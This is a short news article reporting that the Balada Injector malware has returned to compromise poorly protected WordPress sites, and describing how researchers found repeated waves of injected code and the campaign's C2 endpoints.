Balada Injector malware is reportedly back. One of the most worrying WordPress malware threats is now making a comeback and in the process compromising websites across the internet.
Balada Injector Malware Is Back
The Balada Injector malware just as you should know is now alive and kicking, and in the process compromising poorly protected WordPress websites across the internet, as well as making use of them to target visitors, new research has now claimed.
A recent report from researchers at Cybernews claims to have reportedly found a compromised WordPress website during a “routine web monitoring operation”.
How the Affected Website Was Targeted and Attacked
The compromised website in question was apparently targeted by the Balada Injector malware which is a Linux-based backdoor that is used to infiltrate websites via common or otherwise known vulnerabilities in WordPress plugins, themes, and even similar vulnerabilities. The Balada Injector as you should know is known for attacking in “waves” – every month or so therefore, the injector in question would make use of a new domain name, and a new code, which it would then try to add to the code of the WordPress site.
This particular site in question has had seven different instances of malicious code reportedly added and stacked on top of one another. That simply means that the website in question suffered seven “waves” of hacking attacks. This very code, which was added to the very top of the page and would then run before the website loaded, was simply meant to grant the threat actors remote access to infected machines and then redirect visitors to different websites with malvertising campaigns actively running.
How the Researchers Found the Malware
When the researchers in question carrying out the routine check deobfuscated and examined some of the PHP payloads that were found on the compromised website, they got to discover URLs of newly spawned Command & Control (C2) endpoints, as well as subsequent obfuscated JavaScript files, that were used in the operation scheme. A total of five URLs were found by the researchers being accessed to load malicious JavaScript onto exploited websites, the researchers stated.
Good News for Potential Victims
The good news here for potential victims is that the Balada Injector still is not as advanced as it could be. It does not check if compromised websites have had malicious code added prior, and just because of that, instead of just serving the landing page, the website in question then forced the download of a PHP file, which then reportedly raised red flags with the researchers and, at the end of the day, helped to discover the hacking campaign.
MORE RELATED POSTS
